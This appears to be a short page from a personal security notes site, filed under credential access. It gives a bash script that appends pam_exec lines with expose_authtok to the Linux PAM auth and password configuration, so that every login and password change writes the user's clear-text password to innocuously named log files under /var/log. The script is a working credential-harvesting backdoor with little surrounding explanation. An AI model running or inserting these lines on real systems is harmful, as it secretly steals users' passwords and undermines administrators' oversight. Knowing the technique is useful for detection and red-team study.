Modifying PAM to reveal Clear-text Credentials

Secondary Categories: 02 - Credential Access

Each time a user authenticates or changes their password it will be logged in the log file we specified.

#!/bin/bash
# Creating a log file 
touch /var/log/systok.log
touch /var/log/syscommon.log
 
#
echo "auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat" >> /etc/pam.d/common-auth
 
echo "auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat" >> /etc/pam.d/common-password

The Void 🌌

Explorer

Modifying PAM to reveal Clear-text Credentials

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer